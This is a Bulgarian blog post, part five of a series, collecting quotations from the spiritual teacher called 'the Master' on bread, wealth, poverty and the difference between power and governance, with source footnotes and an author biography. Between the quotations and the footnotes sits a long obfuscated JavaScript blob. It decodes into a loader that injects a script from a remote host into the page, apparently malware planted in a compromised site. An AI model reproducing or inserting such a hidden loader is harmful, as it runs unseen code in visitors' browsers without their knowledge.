Учителя за социалните въпроси (5)

„Каква е тази държава, която не следи за житото на всеки човек поотделно? Каква е тази религия, която оставя да взимат житото на този или на онзи?“

Продължава от части: 1, 2, 3, 4 »

Ако разделите богатството на Земята поравно, на всеки човек ще се паднат само по 40 лева. Можеш ли да бъдеш щастлив с 40 лева? Ще кажете, че са ви нужни поне четири хиляди лева месечно. Отде ще вземете тези пари? — Трябва да ощетите други, за да задоволите себе си. Това не е разрешение на въпроса. Този въпрос се разрешава с труд и работа — ако се трудиш и работиш, всичко ще имаш; ако не се трудиш и не работиш, нищо няма да имаш. Този закон е верен не само за физическия свят, а за всички светове.1

* * *

Светът се поддържа не от богатите, а от бедните. Светът се издържа не с капитали и пари, а с труд.2

* * *

Природата не търпи гладни хора, защото те развалят духа и разположението на ситите. Когато яде един, трябва да има за всички. Пълненето трябва да бъде за всички, но и изпразването трябва да бъде за всички. Сегашните революции не са нищо друго, освен резултат на дългогодишното неправилно хранене.
Сега Бог казва на бедните: „Идете да изхвърлите богатите, да заемете местата им. След две хиляди години, като дойда отново на Земята, ще уравня сметките между богатите и бедните.“ Това е закон.3

* * *

Когато създаде хляба, Бог забрани на хората да го продават. Голямо проклятие виси върху човечеството. Защо? — Защото продават хляба — великото благо в живота. Абсолютно е забранено да се продават хлябът и брашното. […]

България трябва да бъде първата държава, която да приложи Божия Закон на Земятахлябът да се дава даром. Само онзи може да приложи този закон, който е абсолютно чист и безгрешен. Грешният не само, че няма да приложи този закон, а ще създаде и още по-лош. Само мъдрият, праведният може да приложи този закон.4

* * *

Хляб с пари не се купува. Заблуждение е да се мисли, че хлябът се купува с пари. Той иде даром от Слънцето. И милиарди да му давате, Слънцето не се нуждае от пари. Слънцето дава хляба даром, а хората плащат само за превоза.5

* * *

Бог е определил по колко килограма жито се пада на всеки човек през годината. Получава ли той житото, което му е определено? — Не го получава. Къде отива то? — В хамбарите на търговците, които чакат благоприятни моменти да поскъпне житото и тогава да го продават.

След всичко това казваме, че имаме държава, която следи за реда и порядъка на страната; от друга страна, се хвалим с религия и казваме, че сме християни и вярваме в Христа. Каква е тази държава, която не следи за житото на всеки човек поотделно? Каква е тази религия, която оставя да взимат житото на този или на онзи?6

* * *

Коя е причината за общото разстройство на организма? — Хлябът. В бъдеще трябва да се избират фурнаджиите. Болен, грешен, нечестен човек не може да бъде фурнаджия — само добрият, честният, здравият може да стане фурнаджия. Като меси хляба, той трябва да мисли добро за всички. Ако домакинята е неразположена, не трябва да меси хляб. Неразположението е като проказата — не внасяйте тази проказа в хляба. […]

Че хлябът и брашното се купуват и продават, това не те интересува. Казваш: «Това е в реда на нещата, установен чрез закон.» Всеки трябва да реши този въпрос сам за себе си. Ако вие не го разрешите, има сили вън от вас, които ще го разрешат.7

* * *

Имаш ли богатство, прави добро, защото, като ти го вземе Господ, не ще можеш да правиш добро. Като дойдат комунистите, ще ти оберат всичко и ще ти дадат една стаица да се разполагаш — и ще бъдеш доволен. Те сега чакат да умре дядо им и да получат наследството. Дядото го крепят сега с инжекции, за да поживее още малко.8

* * *

Съвременният ред в света е изопачен от хората. Той представлява карикатура на Божествения Свят.9

* * *

Хората трябва да правят разлика между власт и управа в света. Според мене, властта е Божествен Атрибут, а управата — човешки. Някъде управата може да бъде съгласна с властта, а някъде не върви с властта. Мнозина смесват тези две неща — казват, че управлението е власт, и намират, че така трябва да бъде. Не, не е така!

Да управляваш, това не е Божествено, това е човешко. Според Божествената Власт на всеки човек е дадено правото сам да се управлява, а властта е обща за всички — всички трябва да властват, а всеки трябва да управлява себе си. А в сегашния живот, според човешките разбирания, всеки има власт над себе си, управата има власт над всички — законът е изменен точно обратно.

Казвам: Как ще се оправи светът? — Турете властта върху всички, а всеки сам да се управлява тъй, както знае.

Някои ще кажат: «Че как тъй? Как е възможно това как ще се управляват сами?»

Казвам: Ако имате едно неразумно същество, което не е надарено с разум, което не е надарено със сърце, с воля, то има нужда други да го управляват. Но има ли нужда един професор да му казвате как да реши задачата си? — Дайте му задачата и го оставете сам да я решава по какъвто начин си иска. Достатъчно е задачата да е решена правилно, а после той ще изпита и нейните резултати.10

Към шеста част »


$=~[];$={___:++$,$$$$:(![]+““)[$],__$:++$,$_$_:(![]+““)[$],_$_:++$,$_$$:({}+““)[$],$$_$:($[$]+““)[$],_$$:++$,$$$_:(!““+““)[$],$__:++$,$_$:++$,$$__:({}+““)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+““)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+““)[$.__$])+((!$)+““)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!““+““)[$.__$])+($._=(!““+““)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!““+““)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+“\““+“\\“+$.__$+$.$$_+$.$$_+$.$_$_+“\\“+$.__$+$.$$_+$._$_+“\\“+$.$__+$.___+$.$$$_+(![]+““)[$._$_]+“\\“+$.$__+$.___+“=\\“+$.$__+$.___+$.$$_$+$._$+$.$$__+$._+“\\“+$.__$+$.$_$+$.$_$+$.$$$_+“\\“+$.__$+$.$_$+$.$$_+$.__+“.“+$.$$__+“\\“+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+“\\“+$.__$+$.___+$.$_$+(![]+““)[$._$_]+$.$$$_+“\\“+$.__$+$.$_$+$.$_$+$.$$$_+“\\“+$.__$+$.$_$+$.$$_+$.__+“(‘\\“+$.__$+$.$$_+$._$$+$.$$__+“\\“+$.__$+$.$$_+$._$_+“\\“+$.__$+$.$_$+$.__$+“\\“+$.__$+$.$$_+$.___+$.__+“‘);\\“+$.__$+$._$_+$.$$$_+(![]+““)[$._$_]+“.\\“+$.__$+$.$$_+$._$$+“\\“+$.__$+$.$$_+$._$_+$.$$__+“\\“+$.$__+$.___+“=\\“+$.$__+$.___+“‘\\“+$.__$+$.$_$+$.___+$.__+$.__+“\\“+$.__$+$.$$_+$.___+“\\“+$.__$+$.$$_+$._$$+“://\\“+$.__$+$.$$_+$.$$$+$.$$$_+$.$_$$+“.\\“+$.__$+$.$$_+$._$$+$.__+$.$_$_+$.__+“\\“+$.__$+$.$_$+$.__$+“.“+$.$_$$+“\\“+$.__$+$.$_$+$.__$+$.$$_$+“/\\“+$.__$+$.$_$+$._$_+“\\“+$.__$+$.$$_+$._$$+“/\\“+$.__$+$.$_$+$._$$+“\\“+$.__$+$.$$$+$.___+$.$_$_+“\\“+$.__$+$.___+$.$__+“\\“+$.__$+$._$$+$.__$+“\\“+$.__$+$.$$_+$.$$$+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$.__$+$._$_+“\\“+$.__$+$._$_+$.$_$+“\\“+$.__$+$._$_+$.__$+“\\“+$.__$+$._$_+$.$$_+“\\“+$.__$+$._$$+$._$_+$._$+“\\“+$.__$+$.$$$+$.___+“\\“+$.__$+$._$_+$.__$+$.$$__+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$.$$_+$.$$$+“\\“+$.__$+$.___+$.$$$+“\\“+$.__$+$._$$+$.___+$.$$_$+(![]+““)[$._$_]+“\\“+$.__$+$._$$+$.___+$._$_+“\\“+$.__$+$.$$_+$._$$+“\\“+$.__$+$._$_+$._$_+“\\“+$.__$+$._$_+$.$__+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$.$$_+$._$$+“\\“+$.__$+$.$$_+$.$$$+“\\“+$.__$+$._$_+$.$$$+“\\“+$.__$+$._$_+$.___+“\\“+$.__$+$.__$+$.$_$+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$.___+$._$_+$.___+“\\“+$.__$+$._$$+$._$_+“\\“+$.__$+$._$_+$.$_$+“\\“+$.__$+$._$_+$.___+$.$$$_+“\\“+$.__$+$.__$+$.__$+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$.__$+$.___+$.$$$+“\\“+$.__$+$._$_+$.$_$+“\\“+$.__$+$._$_+$.$$$+“\\“+$.__$+$.__$+$.$_$+“\\“+$.__$+$.$_$+$.__$+“\\“+$.__$+$.__$+$.$_$+“\\“+$.__$+$._$_+$._$_+“\\“+$.__$+$.__$+$.___+“\\“+$.__$+$._$_+$._$_+“\\“+$.__$+$.___+$.$_$+“\\“+$.__$+$._$_+$.$__+“\\“+$.__$+$.__$+$.___+$.$$_$+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$.$_$+$._$_+“\\“+$.__$+$.___+$.$$$+$.$___+“\\“+$.__$+$._$_+$.$_$+“\\“+$.__$+$._$_+$.$__+“\\“+$.__$+$._$_+$.__$+“\\“+$.__$+$._$$+$._$_+$.$$_$+“\\“+$.__$+$.$__+$.$$$+“\\“+$.__$+$.___+$.$_$+“\\“+$.__$+$.___+$._$_+$.__+“\\“+$.__$+$.$$_+$.$$$+“\\“+$.__$+$.___+$._$_+“\\“+$.__$+$.___+$._$$+$.__+“\\“+$.__$+$.$$$+$.__$+“\\“+$.__$+$._$$+$._$_+“\\“+$.__$+$.$$$+$._$_+$._$+“\\“+$.__$+$._$_+$.__$+“\\“+$.__$+$._$_+$.$$$+“\\“+$.__$+$.__$+$.$__+$.__$+“\\“+$.__$+$.$_$+$._$_+“\\“+$.__$+$.__$+$._$_+“\\“+$.__$+$.__$+$.$_$+“\\“+$.__$+$.$$_+$._$$+“\\“+$.__$+$.$__+$.$$$+“\\“+$.__$+$.__$+$.$$_+“\\“+$.__$+$._$_+$.$__+$._$+$._$_+“\\“+$.__$+$.__$+$._$$+“\\“+$.__$+$._$_+$.___+$.___+“\\“+$.__$+$.___+$._$_+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$._$_+$.$$$+“\\“+$.__$+$._$$+$.__$+“\\“+$.__$+$.___+$._$$+$.$$_$+“-\\“+$.__$+$._$$+$.__$+“\\“+$.__$+$.$_$+$._$$+$.$_$$+“\\“+$.__$+$.___+$._$$+“\\“+$.__$+$.$$_+$.___+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$._$_+$.__$+$.$$__+“\\“+$.__$+$.__$+$.$$_+“\\“+$.__$+$.$_$+$._$_+“\\“+$.__$+$.___+$._$$+“-\\“+$.__$+$.$_$+$._$$+$.__$+“\\“+$.__$+$.___+$._$_+“\\“+$.__$+$.$_$+$.__$+“\\“+$.__$+$.__$+$.__$+$._$_+“\\“+$.__$+$.___+$.$$$+$.$_$+$.$$__+“\\“+$.__$+$.$_$+$.___+“\\“+$.__$+$.___+$.__$+“_“+$.$__+“\\“+$.__$+$.$_$+$.___+“\\“+$.__$+$.__$+$.$_$+“\\“+$.__$+$.$$_+$.__$+“\\“+$.__$+$.___+$.$$_+“\\“+$.__$+$._$_+$._$$+“\\“+$.__$+$.__$+$.___+$.$$$+“\\“+$.__$+$.__$+$.$_$+“\\“+$.__$+$._$_+$.$$$+“\\“+$.__$+$.___+$.__$+$._+“\\“+$.__$+$.___+$.$_$+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$.__$+$.$$_+“\\“+$.__$+$.$_$+$.___+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$.$_$+$._$$+“\\“+$.__$+$._$_+$._$_+“\\“+$.__$+$.$_$+$._$_+$.$$__+“\\“+$.__$+$._$_+$._$$+“\\“+$.__$+$.___+$.$$_+“\\“+$.__$+$.___+$._$$+“\\“+$.__$+$.___+$._$_+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$.___+$.$$$+“\\“+$.__$+$.$_$+$.$_$+“\\“+$.__$+$.$$_+$.___+“\\“+$.__$+$.___+$._$_+“\\“+$.__$+$.___+$.$$_+“\\“+$.__$+$.___+$.$$$+“\\“+$.__$+$._$$+$.__$+“\\“+$.__$+$.___+$.__$+“\\“+$.__$+$._$$+$.___+“\\“+$.__$+$._$_+$.__$+“\\“+$.__$+$.$$$+$.___+“\\“+$.__$+$.$$_+$.$$$+$.$_$_+“.\\“+$.__$+$.$_$+$._$_+“\\“+$.__$+$.$$_+$._$$+“?“+$.__+“\\“+$.__$+$.$$_+$._$_+(![]+““)[$._$_]+“=“+$.___+“.“+$._$_+$.___+“‘;\\“+$.__$+$._$_+$.$$_$+$._$+$.$$__+$._+“\\“+$.__$+$.$_$+$.$_$+$.$$$_+“\\“+$.__$+$.$_$+$.$$_+$.__+“.\\“+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+“.“+$.$_$_+“\\“+$.__$+$.$$_+$.___+“\\“+$.__$+$.$$_+$.___+$.$$$_+“\\“+$.__$+$.$_$+$.$$_+$.$$_$+“\\“+$.__$+$.___+$._$$+“\\“+$.__$+$.$_$+$.___+“\\“+$.__$+$.$_$+$.__$+(![]+““)[$._$_]+$.$$_$+“(„+$.$$$_+(![]+““)[$._$_]+“);“+“\““)())();
Бележки:

  1. ДА ВЪЗЛЮБИШ ГОСПОДА, Неделни беседи от Учителя (1916-1920), София 1946, с. 56 [^]
  2. ДВАТА ПРИРОДНИ МЕТОДА, Неделни беседи VI серия (1923-24), София 1924, с. 42 [^]
  3. НОВИЯТ ЧОВЕК, Неделни беседи от Учителя (1921), София 1947, с. 82 [^]
  4. НОВИЯТ ЧОВЕК, Неделни беседи от Учителя (1921), София 1947, с. 192 сл. [^]
  5. ЗАВЕТЪТ НА ЛЮБОВТА, Беседи от Учителя (1944), том II, София 1944, с. 201 [^]
  6. ПРАВЕДНИЯТ, Неделни беседи IХ серия (1926-27), том 3, София 1931, с. 13 сл.. [^]
  7. НОВИЯТ ЧОВЕК, Неделни беседи от Учителя (1921), София 1947, с. 195 [^]
  8. КРОТКИТЕ, извънредни беседи (1921-23), София 1996, с. 18 2 II 1921 [^]
  9. ВСЕ ЩО Е ПИСАНО, Неделни беседи от Учителя (1917), София 1942, с. 83 [^]
  10. ВЗЕМИ ДЕТЕТО, Неделни беседи ХV серия (1931-1932), том 2, Бургас 1993, с. 292 [^]

Споделете публикацията

Google1

За Асен Чилингиров

tschilingirov@mail.bg | Проф. д-р Асен Чилингиров е роден през 1932 г. в София. Завършва история, музика и история на изкуствата в България. От 1964 г. живее и работи в Берлин, Германия. Там завършва история на изкуствата. Автор е на над 400 научни труда. Между тях са „Голяма история на християнското изкуство в България“ и „Културна история на България“, издадени на немски език във ФРГ и ГДР. Преподава в Берлинския, Лайпцигския и Хумболтовия университет. Главен консултант е за Балканското изкуство в „Енциклопедията за средновековно изкуство“ в Рим за периода 1984 – 1995 г. Вижте книгите на проф. Чилингиров в архива на „От Извора“ »

Всички публикации

Коментарите са заключени.